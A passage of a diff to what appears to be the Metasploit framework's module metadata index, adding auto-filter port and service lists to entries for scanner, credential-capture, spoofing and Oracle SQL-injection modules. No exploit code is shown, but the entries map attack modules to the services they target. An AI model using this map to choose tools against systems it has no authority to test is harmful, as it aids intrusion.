"", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-20 20:29:56 +0000", "path": "/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb", @@ -27781,6 +37644,12 @@ "platform": "", "arch": "", "rport": 27015, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/steam/server_info.rb", @@ -27810,6 +37679,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telephony/wardial.rb", @@ -27839,6 +37714,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb", @@ -27868,6 +37749,12 @@ "platform": "", "arch": "", "rport": 30718, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb", @@ -27898,6 +37785,12 @@ "platform": "", "arch": "", "rport": 9999, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb", @@ -27929,6 +37822,12 @@ "platform": "", "arch": "", "rport": 5000, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb", @@ -27962,6 +37861,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2018-02-14 09:19:28 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb", @@ -27991,6 +37896,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-12-14 08:07:59 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb", @@ -28023,6 +37934,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb", @@ -28052,6 +37969,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_version.rb", @@ -28082,6 +38005,12 @@ "platform": "", "arch": "", "rport": 1025, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py", @@ -28120,6 +38049,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb", @@ -28152,6 +38087,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb", @@ -28181,6 +38122,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb", @@ -28211,6 +38158,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/udp/udp_amplification.rb", @@ -28241,6 +38194,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb", @@ -28274,6 +38233,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb", @@ -28307,6 +38272,12 @@ "platform": "", "arch": "", "rport": 6082, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-09 11:25:13 +0000", "path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb", @@ -28340,6 +38311,12 @@ "platform": "", "arch": "", "rport": 6082, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb", @@ -28369,6 +38346,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb", @@ -28398,6 +38390,12 @@ "platform": "", "arch": "", "rport": 902, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb", @@ -28428,6 +38426,12 @@ "platform": "", "arch": "", "rport": 902, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb", @@ -28457,6 +38461,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb", @@ -28486,6 +38505,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb", @@ -28515,6 +38549,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb", @@ -28544,6 +38593,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", @@ -28573,6 +38637,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb", @@ -28602,6 +38681,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb", @@ -28631,6 +38725,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb", @@ -28664,6 +38773,21 @@ "platform": "", "arch": "", "rport": 8222, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb", @@ -28697,6 +38821,21 @@ "platform": "", "arch": "", "rport": 9084, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb", @@ -28727,6 +38866,12 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-05 10:12:13 +0000", "path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb", @@ -28757,6 +38902,22 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + 5900, + 5901, + 5902, + 5903, + 5904, + 5905, + 5906, + 5907, + 5908, + 5909, + 5910 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb", @@ -28789,6 +38950,12 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb", @@ -28818,6 +38985,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/voice/recorder.rb", @@ -28848,6 +39021,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb", @@ -28878,6 +39057,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb", @@ -28907,6 +39092,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb", @@ -28936,6 +39139,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb", @@ -28965,6 +39186,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb", @@ -28994,6 +39233,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb", @@ -29026,6 +39283,12 @@ "platform": "", "arch": "", "rport": 49152, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py", @@ -29063,6 +39326,12 @@ "platform": "", "arch": "", "rport": 3702, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-29 12:21:22 +0000", "path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb", @@ -29093,6 +39362,12 @@ "platform": "", "arch": "", "rport": 6000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/x11/open_x11.rb", @@ -29122,6 +39397,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/android_browsable_msf_launch.rb", @@ -29154,6 +39435,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/android_mercury_parseuri.rb", @@ -29183,6 +39470,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/browser_autopwn.rb", @@ -29212,6 +39505,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/server/browser_autopwn2.rb", @@ -29241,6 +39540,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/drda.rb", @@ -29271,6 +39576,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/ftp.rb", @@ -29301,6 +39612,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/http.rb", @@ -29330,6 +39647,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/http_basic.rb", @@ -29360,6 +39683,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/http_javascript_keylogger.rb", @@ -29389,6 +39718,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/http_ntlm.rb", @@ -29419,6 +39754,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/imap.rb", @@ -29448,6 +39789,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/mssql.rb", @@ -29477,6 +39824,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/mysql.rb", @@ -29507,6 +39860,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/pop3.rb", @@ -29536,6 +39895,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/postgresql.rb", @@ -29567,6 +39932,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/printjob_capture.rb", @@ -29596,6 +39967,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/sip.rb", @@ -29625,6 +40002,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/smb.rb", @@ -29655,6 +40038,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/smtp.rb", @@ -29684,6 +40073,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:02:33 +0000", "path": "/modules/auxiliary/server/capture/telnet.rb", @@ -29713,6 +40108,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/vnc.rb", @@ -29751,6 +40152,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-17 22:29:20 +0000", "path": "/modules/auxiliary/server/dhclient_bash_env.rb", @@ -29784,6 +40191,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/dhcp.rb", @@ -29813,6 +40226,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + 53 + ], + "autofilter_services": [ + "dns" + ], "targets": null, "mod_time": "2018-01-22 23:37:39 +0000", "path": "/modules/auxiliary/server/dns/native_server.rb", @@ -29843,6 +40262,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/dns/spoofhelper.rb", @@ -29874,6 +40299,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/fakedns.rb", @@ -29903,6 +40334,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/ftp.rb", @@ -29932,6 +40369,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-18 11:33:48 +0000", "path": "/modules/auxiliary/server/http_ntlmrelay.rb", @@ -29963,6 +40415,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/server/icmp_exfil.rb", @@ -29997,6 +40455,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb", @@ -30026,6 +40490,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-14 09:28:38 +0000", "path": "/modules/auxiliary/server/local_hwbridge.rb", @@ -30059,6 +40529,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/ms15_134_mcl_leak.rb", @@ -30094,6 +40570,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/netbios_spoof_nat.rb", @@ -30127,6 +40609,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb", @@ -30163,6 +40651,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/server/openssl_heartbeat_client_memory.rb", @@ -30195,6 +40689,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/pxeexploit.rb", @@ -30226,6 +40726,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/regsvr32_command_delivery_server.rb", @@ -30255,6 +40761,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/socks4a.rb", @@ -30286,6 +40798,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-05-26 13:46:00 +0000", "path": "/modules/auxiliary/server/socks5.rb", @@ -30315,6 +40833,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/socks_unc.rb", @@ -30345,6 +40869,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/tftp.rb", @@ -30374,6 +40904,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/server/webkit_xslt_dropper.rb", @@ -30405,6 +40941,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/wget_symlink_file_write.rb", @@ -30434,6 +40976,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/wpad.rb", @@ -30463,6 +41011,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-04 15:27:20 +0000", "path": "/modules/auxiliary/sniffer/psnuffle.rb", @@ -30494,6 +41048,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/spoof/arp/arp_poisoning.rb", @@ -30523,6 +41083,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/cisco/cdp.rb", @@ -30552,6 +41118,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/cisco/dtp.rb", @@ -30586,6 +41158,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/dns/bailiwicked_domain.rb", @@ -30619,6 +41197,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/dns/bailiwicked_host.rb", @@ -30648,6 +41232,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/spoof/dns/compare_results.rb", @@ -30677,6 +41267,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + 53 + ], + "autofilter_services": [ + "dns" + ], "targets": null, "mod_time": "2018-01-31 23:44:51 +0000", "path": "/modules/auxiliary/spoof/dns/native_spoofer.rb", @@ -30706,6 +41302,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/llmnr/llmnr_response.rb", @@ -30737,6 +41339,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/mdns/mdns_response.rb", @@ -30766,6 +41374,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/nbns/nbns_response.rb", @@ -30795,6 +41409,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/spoof/replay/pcap_replay.rb", @@ -30825,6 +41445,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb", @@ -30855,6 +41481,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb", @@ -30886,6 +41518,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb", @@ -30917,6 +41555,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb", @@ -30951,6 +41595,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb", @@ -30983,6 +41633,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_export_extension.rb", @@ -31012,6 +41668,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb", @@ -31041,6 +41703,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb", @@ -31070,6 +41738,12 @@ "platform": "", 